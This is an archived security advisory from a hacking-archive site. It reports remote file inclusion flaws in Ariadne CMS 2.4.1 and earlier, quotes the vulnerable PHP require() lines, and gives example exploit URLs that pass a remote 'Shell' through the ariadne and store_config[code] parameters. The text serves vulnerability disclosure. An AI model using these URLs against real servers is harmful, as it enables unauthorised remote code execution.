AOH :: HP Unsorted A :: B06-5610.HTM

Ariadne <= 2.4.1 Multiple Remote File Include Vulnerabilities(New)



Ariadne <= 2.4.1 Multiple Remote File Include Vulnerabilities(New)
Ariadne <= 2.4.1 Multiple Remote File Include Vulnerabilities(New)



*******************************************************************************
# Title  :  Ariadne  <= 2.4.1 Multiple Remote File Include Vulnerabilities

# Author :   ajann

# Script Page : http://www.ariadne-cms.org/en/download/ 

# Vuln;

*******************************************************************************
[Files]
loader.php
loader.cmd.php
[/Files]

[Code,1]
loader.php Error:

..
....
require($ariadne."/configs/ariadne.phtml");
    require($ariadne."/configs/ftp/$configfile");
	require($ariadne."/configs/store.phtml");
	require($ariadne."/includes/loader.ftp.php");
	require($ariadne."/configs/sessions.phtml");
	require($ariadne."/stores/".$store_config["dbms"]."store.phtml");
	require($ariadne."/nls/en");
	require($ariadne."/modules/mod_mimemagic.php");
=09
	require($ariadne."/modules/mod_virusscan.php");
....
..

Key [:] ariadne=[file]
Key [:] store_config[code]=[file]

\Example:

http://target.com/path/ftp/loader.php?ariadne=Shell 
http://target.com/path/lib/includes/loader.cmd.php?store_config[code]=Shell 
....

# ajann,Turkey
# ...
# Im not Hacker!

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.